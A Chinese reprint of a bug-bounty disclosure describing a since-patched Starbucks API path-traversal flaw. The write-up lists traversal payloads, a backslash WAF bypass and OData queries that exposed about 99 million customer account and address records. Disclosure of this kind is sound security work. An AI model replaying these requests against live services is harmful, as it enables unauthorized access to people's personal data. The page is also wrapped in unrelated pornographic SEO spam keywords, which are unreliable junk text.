精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

漏洞報告:“入侵”星巴克并訪問1億客戶記錄

安全 漏洞
Sam花了一整天的嘗試,仍然沒有在Verizon Media漏洞賞金計劃中有所收獲,于是,他決定先退出做一些其他事情。他上網(wǎng)準備訂購星巴克的禮品卡,作為朋友的生日禮物。

Sam花了一整天的嘗試,仍然沒有在Verizon Media漏洞賞金計劃中有所收獲,于是,他決定先退出做一些其他事情。他上網(wǎng)準備訂購星巴克的禮品卡,作為朋友的生日禮物。

[[330909]]

當sam在星巴克官網(wǎng)上試圖購買時,他發(fā)現(xiàn)了API調(diào)用的可疑之處:在以“ / bff / proxy /”為前綴的API下發(fā)送了一些請求,但這些請求返回的數(shù)據(jù)似乎來自另一臺主機。

正好,由于星巴克有一個漏洞賞金計劃,于是,繼續(xù)研究下去吧。

以下是返回sam的用戶信息的其中之一的API調(diào)用示例:

  1. POST /bff/proxy/orchestra/get-user HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "data": { 
  7.  
  8.     "user": { 
  9.  
  10.       "exId": "77EFFC83-7EE9-4ECA-9049-A6A23BF1830F", 
  11.  
  12.       "firstName": "Sam", 
  13.  
  14.       "lastName": "Curry", 
  15.  
  16.       "email": "samwcurry@gmail.com", 
  17.  
  18.       "partnerNumber": null, 
  19.  
  20.       "birthDay": null, 
  21.  
  22.       "birthMonth": null, 
  23.  
  24.       "loyaltyProgram": null 
  25.  
  26.     } 
  27.  
  28.   } 
  29.  

在上面的示例中,“ app.starbucks.com”主機將無法訪問通過特定端點訪問的數(shù)據(jù),但可以充當假設(shè)的第二個主機的代理或中間人,“internal.starbucks.com”。

這里要考慮的一些有趣的事情是……

  • 我們?nèi)绾螠y試應(yīng)用程序的路由?
  • 如果應(yīng)用程序?qū)⒄埱舐酚傻絻?nèi)部主機,則權(quán)限模型是什么樣的?
  • 我們可以控制發(fā)送到內(nèi)部主機的請求中的路徑或參數(shù)嗎?
  • 內(nèi)部主機上是否有開放重定向,如果有,應(yīng)用程序?qū)⒆裱_放重定向嗎?
  • 返回的內(nèi)容是否必須匹配適當?shù)念愋?是否解析JSON,XML或任何其他數(shù)據(jù)?)

Sam做的第一件事是嘗試遍歷API調(diào)用,以便可以加載其他路徑,而執(zhí)行此操作的方式是發(fā)送以下負載:

  1. /bff/proxy/orchestra/get-user/..%2f 
  2.  
  3. /bff/proxy/orchestra/get-user/..;/ 
  4.  
  5. /bff/proxy/orchestra/get-user/../ 
  6.  
  7. /bff/proxy/orchestra/get-user/..%00/ 
  8.  
  9. /bff/proxy/orchestra/get-user/..%0d/ 
  10.  
  11. /bff/proxy/orchestra/get-user/..%5c 
  12.  
  13. /bff/proxy/orchestra/get-user/..\ 
  14.  
  15. /bff/proxy/orchestra/get-user/..%ff/ 
  16.  
  17. /bff/proxy/orchestra/get-user/%2e%2e%2f 
  18.  
  19. /bff/proxy/orchestra/get-user/.%2e/ 
  20.  
  21. /bff/proxy/orchestra/get-user/%3f (?) 
  22.  
  23. /bff/proxy/orchestra/get-user/%26 (&) 
  24.  
  25. /bff/proxy/orchestra/get-user/%23 (#) 

可惜的是,這些都不起作用。它們都返回了我通常會看到的相同的404頁面……

在這種情況下,我們可以將“ / bff / proxy / orchestra / get-user”視為我們正在調(diào)用的未包含用戶輸入的函數(shù)。同時,我們有機會找到一個確實接受用戶輸入的函數(shù),例如“ / bff / proxy / users /:id”,在這里我們有足夠的空間測試它將接受的數(shù)據(jù)。如果我們發(fā)現(xiàn)這樣的API調(diào)用,那么嘗試遍歷有效負載并發(fā)送其他數(shù)據(jù)(實際上是在用戶輸入中接收)可能會更有幫助。

Sam仔細留意這個App,發(fā)現(xiàn)了更多的API調(diào)用。而他發(fā)現(xiàn)的接受用戶輸入的第一個信息是:

  1. GET /bff/proxy/v1/me/streamItems/:streamItemId HTTP/1.1  
  2. Host: app.starbucks.com 

這個端點不同于“get user”端點,因為最后一個路徑作為參數(shù)存在,在其中提供了任意輸入。如果將此輸入作為內(nèi)部系統(tǒng)上的路徑處理,那么完全可能遍歷它并訪問其他內(nèi)部端點。

幸運的是,sam嘗試的第一個測試返回了一個非常好的指標,表明可以遍歷端點:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "errors": [ 
  7.  
  8.     { 
  9.  
  10.       "message": "Not Found", 
  11.  
  12.       "errorCode": 404, 
  13.  
  14.       ... 

這個JSON響應(yīng)與“ / bff / proxy”下所有其他常規(guī)API調(diào)用的JSON響應(yīng)相同。這表明sam正在使用內(nèi)部系統(tǒng),并且已經(jīng)成功地修改了正在與之交談的路徑。下一步將是映射內(nèi)部系統(tǒng),而做到這一點的最佳方法將是通過標識返回“ 400錯誤請求”的第一條路徑遍歷到根。

但很快,sam遇到了一個障礙。有一個WAF讓他不能深入兩個目錄:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/..\..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5. HTTP/1.1 403 Forbidden 
  6.  
  7. 不過,這個WAF很弱…… 
  8.  
  9. GET /bff/proxy/v1/me/streamItems/web\..\.\..\ HTTP/1.1 
  10.  
  11. Host: app.starbucks.com 
  12.  
  13.  
  14.   "errors": [ 
  15.  
  16.     { 
  17.  
  18.       "message": "Not Found", 
  19.  
  20.       "errorCode": 404, 
  21.  
  22.       ... 

最終,在返回7條路徑后,sam收到了以下錯誤:

  1. GET /bff/proxy/v1/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\..\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "errors": [ 
  7.  
  8.     { 
  9.  
  10.       "message": "Bad Request", 
  11.  
  12.       "errorCode": 400, 
  13.  
  14.       ... 

這意味著內(nèi)部API的根是6個返回路徑,可以使用目錄暴力破解工具或Burp Suite的入侵者和單詞列表將其映射出來。

此時,sam對這個漏洞更加感興趣了,他和Justin Gardner進行了探討。

而Justin Gardner幾乎立即在內(nèi)部系統(tǒng)的根目錄下識別出許多路徑,方法是觀察到對這些路徑的HTTP請求,之后如果沒有正斜杠,就會使用Burp的入侵者返回重定向代碼:

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5. HTTP/1.1 301 Moved Permanently 
  6.  
  7. Server: nginx 
  8.  
  9. Content-Type: text/html 
  10.  
  11. Content-Length: 162 
  12.  
  13. Location: /search/ 

Justin致力于尋找所有端點時,sam開始逐一研究每個目錄。運行完自己的掃描后,sam發(fā)現(xiàn)“搜索”下有“v1”,而“v1”下有“賬戶”和“地址”。

于是,他給Justin發(fā)了一條消息,想想如果“ / search / v1 / accounts”端點是對所有生產(chǎn)帳戶的搜索,那將是多么有趣……

而事實,果然如此。“ / search / v1 / accounts”可以訪問所有星巴克帳戶的Microsoft Graph實例。

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Accounts\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 1, 
  13.  
  14.       "ExternalId": "12345", 
  15.  
  16.       "UserName": "UserName", 
  17.  
  18.       "FirstName": "FirstName", 
  19.  
  20.       "LastName": "LastName", 
  21.  
  22.       "EmailAddress": "0640DE@example.com", 
  23.  
  24.       "Submarket": "US", 
  25.  
  26.       "PartnerNumber": null, 
  27.  
  28.       "RegistrationDate": "1900-01-01T00:00:00Z", 
  29.  
  30.       "RegistrationSource": "iOSApp", 
  31.  
  32.       "LastUpdated": "2017-06-01T15:32:56.4925207Z" 
  33.  
  34.     }, 
  35.  
  36. ... 
  37.  
  38. lots of production accounts 

此外,“地址”端點返回了類似的信息……

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\search\v1\Addresses\ HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Addresses", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 1, 
  13.  
  14.       "AccountId": 1, 
  15.  
  16.       "AddressType": "3", 
  17.  
  18.       "AddressLine1": null, 
  19.  
  20.       "AddressLine2": null, 
  21.  
  22.       "AddressLine3": null, 
  23.  
  24.       "City": null, 
  25.  
  26.       "PostalCode": null, 
  27.  
  28.       "Country": null, 
  29.  
  30.       "CountrySubdivision": null, 
  31.  
  32.       "FirstName": null, 
  33.  
  34.       "LastName": null, 
  35.  
  36.       "PhoneNumber": null 
  37.  
  38.     }, 
  39.  
  40. ... 
  41.  
  42. lots of production addresses 

它是為生產(chǎn)帳戶和地址提供的服務(wù)。隨后,sam開始進一步探索該服務(wù),以使用Microsoft Graph功能進行確認。

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\Search\v1\Accounts?$count=true 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "@odata.count":99356059 
  9.  

通過從Microsoft Graph URL添加“ $ count”參數(shù),可以確定該服務(wù)具有近1億條記錄。攻擊者可以通過添加“ $ skip”和“ $ count”之類的參數(shù)枚舉所有用戶帳戶來竊取此數(shù)據(jù)。

此外,要查明特定的用戶帳戶,攻擊者可以使用“ $ filter”參數(shù):

  1. GET /bff/proxy/stream/v1/users/me/streamItems/web\..\.\..\.\..\.\..\.\..\.\..\.\Search\v1\Accounts?$filter=startswith(UserName,'redacted') HTTP/1.1 
  2.  
  3. Host: app.starbucks.com 
  4.  
  5.  
  6.   "@odata.context": "https://redacted.starbucks.com/Search/v1/$metadata#Accounts", 
  7.  
  8.   "value": [ 
  9.  
  10.     { 
  11.  
  12.       "Id": 81763022, 
  13.  
  14.       "ExternalId": "59d159e2-redacted-redacted-b037-e8cececdf354", 
  15.  
  16.       "UserName": "redacted@gmail.com", 
  17.  
  18.       "FirstName": "Justin", 
  19.  
  20.       "LastName": "Gardner", 
  21.  
  22.       "EmailAddress": "redacted@gmail.com", 
  23.  
  24.       "Submarket": "US", 
  25.  
  26.       "PartnerNumber": null, 
  27.  
  28.       "RegistrationDate": "2018-05-19T18:52:15.0763564Z", 
  29.  
  30.       "RegistrationSource": "Android", 
  31.  
  32.       "LastUpdated": "2020-05-16T23:28:39.3426069Z" 
  33.  
  34.     } 
  35.  
  36.   ] 
  37.  

最后,sam還發(fā)現(xiàn)的其他一些端點,可能(尚未確認)使攻擊者能夠訪問和修改帳單地址、禮品卡、獎勵和優(yōu)惠等內(nèi)容。

  1. barcode, loyalty, appsettings, card, challenge, content, identifier, identity, onboarding, orderhistory, permissions, product, promotion, account, billingaddress, enrollment, location, music, offers, rewards, keyserver 

時間線

  • 5月16日報道
  • 5月17日補丁
  • 5月19日頒發(fā)賞金(4000美元)
  • 6月16日公開

參考鏈接:https://samcurry.net/hacking-starbucks/

 

責任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2015-09-20 21:02:36

2020-11-05 08:20:01

星巴克官網(wǎng)漏洞web安全

2013-05-24 09:18:47

游戲設(shè)計

2024-11-27 15:45:28

2015-08-14 13:43:43

2012-06-25 15:39:12

云計算案例

2021-03-29 15:44:21

數(shù)據(jù)管理

2012-01-10 10:36:48

云計算

2012-02-22 16:32:42

星巴克WifiUC瀏覽器

2012-03-31 10:03:41

WiFi

2019-06-25 08:28:06

區(qū)塊鏈供應(yīng)鏈沃爾瑪

2011-12-06 20:52:03

移動支付

2010-09-02 12:30:40

2017-09-25 14:47:11

支付寶微信Apple Pay

2021-11-18 11:45:54

Stripchat漏洞信息泄露

2021-04-14 14:12:20

WRECK漏洞IoT設(shè)備

2015-06-25 13:01:28

大數(shù)據(jù)星巴克海底撈

2014-01-03 15:57:39

ICT星巴克

2009-11-11 10:35:04

2010-06-12 09:48:17

點贊
收藏

51CTO技術(shù)棧公眾號

久久这里有精品| 欧美顶级少妇做爰| 欧美日韩国产精品一卡| 国产精品熟女视频| 天天做综合网| 亚洲成人激情在线观看| 欧美一级黄色影院| www.在线视频| 26uuu久久天堂性欧美| 国产精品自产拍在线观看| 国产亚洲欧美精品久久久www| 久久动漫网址| 欧美日韩精品欧美日韩精品一| 久久久久亚洲av无码专区喷水| 日韩在线视频第一页| 日韩电影网1区2区| 久久久久久亚洲| 一级在线观看视频| 麻豆一区一区三区四区| 精品视频全国免费看| 可以看毛片的网址| 欧美成人xxx| 久久免费看少妇高潮| 91九色极品视频| 国产情侣小视频| 伊人影院久久| 久久国产精品偷| 成年人看的免费视频| 国内毛片久久| 日韩视频免费观看高清完整版| 91n.com在线观看| 亚洲天堂资源| 亚洲第一激情av| 男女激烈动态图| 色大18成网站www在线观看| 99久久精品一区| 2022国产精品| 96日本xxxxxⅹxxx17| 日韩精品电影在线| 91精品国产色综合| 国产在线视频99| 欧美日韩亚洲国产精品| 久久亚洲一区二区三区四区五区高| 国产熟女一区二区| 网曝91综合精品门事件在线| 亚洲国产97在线精品一区| 久久黄色一级视频| 精品三级久久久| 884aa四虎影成人精品一区| 91香蕉视频导航| 澳门av一区二区三区| 91久久国产最好的精华液| 国产极品尤物在线| 免费一二一二在线视频| 午夜精品久久久久影视| 国产av人人夜夜澡人人爽麻豆| 日韩av毛片| 亚洲综合免费观看高清在线观看| 男女裸体影院高潮| 91麻豆免费在线视频| 亚洲免费视频成人| 国产成人一二三区| 免费污视频在线| 五月婷婷另类国产| 无码aⅴ精品一区二区三区浪潮 | 欧美国产亚洲另类动漫| 欧美精品一区在线发布| 国产人成在线观看| 中文字幕va一区二区三区| 亚洲精品国产精品久久| 欧美性videos| 亚洲乱码日产精品bd| 无颜之月在线看| 黄色在线网站噜噜噜| 欧美性猛交xxxx乱大交极品| 久久精品国产精品亚洲色婷婷| 竹内纱里奈兽皇系列在线观看| 91九色02白丝porn| 国产女同无遮挡互慰高潮91| 久久av网站| 精品少妇一区二区三区在线播放| jizz日本免费| 国产欧美日韩精品一区二区三区 | 精品国产免费人成电影在线观看四季| 95视频在线观看| 啄木系列成人av电影| 中文字幕精品一区二区精品| 侵犯稚嫩小箩莉h文系列小说| 黄色亚洲在线| 国产不卡av在线免费观看| 亚洲图片欧美在线| 岛国av在线一区| 日本a级片久久久| 国产最新在线| 日韩欧中文字幕| 91pony九色| 亚洲第一二三区| 日韩在线观看免费全集电视剧网站 | 国产第一页在线观看| 久久成人久久鬼色| 成人黄色在线免费观看| 第九色区av在线| 亚洲狠狠丁香婷婷综合久久久| 国产资源在线视频| 天天综合91| 亚洲伦理中文字幕| 欧美精品乱码视频一二专区| 午夜在线播放视频欧美| 亚洲一区二区三区777| 四虎影视2018在线播放alocalhost| 国产精品天美传媒沈樵| 可以在线看的av网站| 久久免费资源| 亚洲免费成人av电影| 真实国产乱子伦对白在线| 新67194成人永久网站| 国产在线视频一区| 日本福利在线观看| 亚洲一二三级电影| 青青草久久伊人| 日韩三级视频| 欧美激情精品久久久久久黑人| 中文字幕日韩国产| 91视频免费播放| 国产青草视频在线观看| 欧美亚洲综合视频| 日韩精品999| 国产在线一区视频| 国产在线视频精品一区| 先锋影音一区二区三区| 亚洲国产成人二区| 亚洲国产欧美一区二区三区同亚洲 | 天天综合色天天综合色h| 国产5g成人5g天天爽| 色135综合网| 国产成人精品在线观看| 青青草超碰在线| 婷婷久久综合九色综合绿巨人| 精品人妻一区二区三| 精品国产乱码久久久久久果冻传媒 | 乱h高h女3p含苞待放| 蜜臀精品一区二区三区在线观看 | 国产综合在线观看| 欧美午夜女人视频在线| 国产精品手机在线观看| 日韩午夜在线电影| 精品国产_亚洲人成在线| av影视在线看| 亚洲高清久久久久久| 国产一级黄色av| 国产99久久久国产精品潘金 | 欧美极度另类| 亚洲男人的天堂网站| 日韩高清精品免费观看| 97精品超碰一区二区三区| www.射射射| 日韩欧美美女在线观看| 国产成人jvid在线播放| 国产二区视频在线观看| 欧美色精品在线视频| 手机看片国产日韩| 久久99精品久久久久| 中文字幕一区二区三区精彩视频| 国产成人精品一区二区三区免费| 日韩在线免费观看视频| 国产精品视频在线观看免费| 亚洲激情自拍视频| 亚洲成年人av| 美女国产一区| 伊人久久av导航| 国产一区二区高清在线| 久久久久久久久亚洲| 瑟瑟在线观看| 欧美三级电影精品| 黄色一级视频免费| 99re这里只有精品6| 日本新janpanese乱熟| 久久久久久影院| 国产精品日韩高清| 高清电影一区| 欧美黑人一区二区三区| 精品久久av| 3d成人动漫网站| 日本熟妇乱子伦xxxx| 久久久另类综合| 91网址在线观看精品| 亚洲一区激情| 亚洲一区3d动漫同人无遮挡 | 狠狠人妻久久久久久| 国产精品伦一区二区三级视频| 国产人妻精品久久久久野外| 亚洲精品极品| 曰韩不卡视频| 欧美黄色网视频| 成人国产精品av| 欧美freesex黑人又粗又大| 在线免费看av不卡| 老熟妇高潮一区二区高清视频 | 午夜精品久久久久久久第一页按摩| 精品欧美一区二区三区| 天堂а√在线中文在线鲁大师| av在线一区二区| 久久久久久久久久毛片| 久久亚洲影院| 久久99久久久久久| 久久精品国产www456c0m| 精品一区2区三区| 国产精品日本一区二区不卡视频| 欧美在线视频a| 羞羞视频在线观看不卡| 国产亚洲欧美另类中文| 色wwwwww| 日韩一二三区视频| 中文字幕欧美色图| 色综合激情久久| 日韩xxx高潮hd| 夜夜爽夜夜爽精品视频| 久草福利资源在线| 久久视频一区二区| 又黄又爽的网站| 国产寡妇亲子伦一区二区| 一区二区三区 日韩| 亚洲欧美网站| 玩弄中年熟妇正在播放| 欧美福利在线| 99久re热视频精品98| 欧美激情黄色片| 欧美日韩一区二| 偷拍精品福利视频导航| 国产一区国产精品| 成人在线tv视频| 97超碰人人模人人爽人人看| www.成人在线.com| 国产日韩av在线| 另类一区二区| 国产精品亚发布| 国产精品无码久久久久| 国产精品69久久| 中韩乱幕日产无线码一区| 国产精品va在线播放我和闺蜜| 亚洲欧洲日本韩国| 茄子视频成人在线| 2022成人影院| 国产成人精品a视频一区www| 欧美7777| 国产精品美女www| 日韩成人一区| 91久久国产精品| 国产一区一区| 国产超碰91| 久久激情av| 久久这里精品国产99丫e6| 亚欧洲精品视频在线观看| 欧美二区在线| 成人av动漫在线观看| 夜夜春亚洲嫩草影视日日摸夜夜添夜 | 久久97超碰国产精品超碰| 中文字幕永久有效| 国精产品一区一区三区mba桃花| 在线黄色免费看| 国产精品白丝jk黑袜喷水| 性高潮免费视频| 91免费看视频| 正在播放国产对白害羞| 亚洲天堂精品在线观看| 久久免费视频99| 狠狠色香婷婷久久亚洲精品| 波多野结衣不卡| 在线综合视频播放| 欧美性猛交 xxxx| 亚洲人成绝费网站色www| √天堂资源地址在线官网| 操日韩av在线电影| а√在线天堂官网| 国产精品国产三级国产aⅴ9色| 亚洲欧美在线人成swag| 国产精品国产亚洲精品看不卡15| 亚洲第一论坛sis| 亚洲自拍的二区三区| 亚洲一本视频| 免费男同深夜夜行网站| 国内精品久久久久影院色| 风韵丰满熟妇啪啪区老熟熟女| 99麻豆久久久国产精品免费优播| 波多野结衣办公室33分钟| 国产精品网曝门| 伊人国产在线观看| 在线日韩国产精品| 国产av一区二区三区精品| 亚洲黄色有码视频| 日本视频不卡| 91精品国产乱码久久久久久蜜臀 | 成人av蜜桃| 久久99国产精品视频| 一区二区三区日韩视频| 亚洲日本免费| www.成人黄色| 99国产一区二区三精品乱码| 成人午夜免费影院| 欧美日韩一区二区精品| 国产精品久久久久久无人区 | 一本大道久久a久久精二百| 国产免费的av| 亚洲网址你懂得| 变态调教一区二区三区| 成人欧美一区二区三区黑人孕妇| 极品束缚调教一区二区网站 | 国内精品久久99人妻无码| 中文字幕在线观看不卡| 欧美精品一二三四区| 678五月天丁香亚洲综合网| 神马亚洲视频| 久久久久久久91| 亚洲我射av| 午夜免费电影一区在线观看| 99xxxx成人网| 日本人dh亚洲人ⅹxx| 国产精品欧美精品| 中文在线第一页| 亚洲国产欧美一区二区三区久久| av激情在线| 成人免费淫片aa视频免费| 精品国产欧美日韩| 夫妻免费无码v看片| 国产福利一区在线观看| www.av免费| 欧美日韩极品在线观看一区| 福利小视频在线观看| 欧美一区二区影院| 丝袜久久网站| 免费成人在线视频网站| 成人免费视频网站在线观看| 青青草手机在线视频| 91麻豆精品国产91久久久| 日本福利在线| 国产在线不卡精品| 香蕉av一区二区| 日韩精品aaa| 一区二区三区精品在线| 国产精品人妻一区二区三区| 久久精品国产欧美亚洲人人爽| 欧洲亚洲精品久久久久| 亚洲精品国产精品国自产| 老汉av免费一区二区三区| 国产又黄又粗视频| 欧美日本在线播放| 黄网页在线观看| 亚洲精品福利视频网站| 2020久久国产精品| 粉嫩91精品久久久久久久99蜜桃| 欧美一区二视频在线免费观看| 国产精品日韩欧美一区| 少妇激情一区二区三区视频| 亚洲一二三级电影| 日韩在线视频第一页| 欧美一级高清免费| 九色成人国产蝌蚪91| 亚洲成人福利在线观看| 久久精品日产第一区二区三区高清版| 五月激情六月丁香| 亚洲人成五月天| 高清在线一区| a级网站在线观看| 国产成人精品免费一区二区| 久久黄色免费视频| 精品动漫一区二区三区在线观看| 国产第一页在线| 精品视频高清无人区区二区三区| 亚洲综合另类| 免费看的黄色录像| 91精品视频网| heyzo高清中文字幕在线| 久久久精彩视频| 久久一二三四| 免费成人美女女在线观看| 3d成人动漫网站| h片在线观看| 日韩久久不卡| 精品一区二区三区日韩| 久久综合加勒比| 亚洲毛片一区二区| 成人国产精品入口免费视频| 黄色a级在线观看| 97精品久久久午夜一区二区三区 | 日韩亚洲国产欧美| 夜夜春很很躁夜夜躁| 欧美一级xxx| 成人线上视频| 欧美 另类 交| 99久久免费视频.com| 一二三四区在线| 欧美大片免费看| 成人直播大秀| 性色av蜜臀av浪潮av老女人| 欧洲人成人精品| 黄污视频在线观看| 亚洲欧洲久久| 97精品久久久午夜一区二区三区| 一二三四区在线| 日本电影亚洲天堂|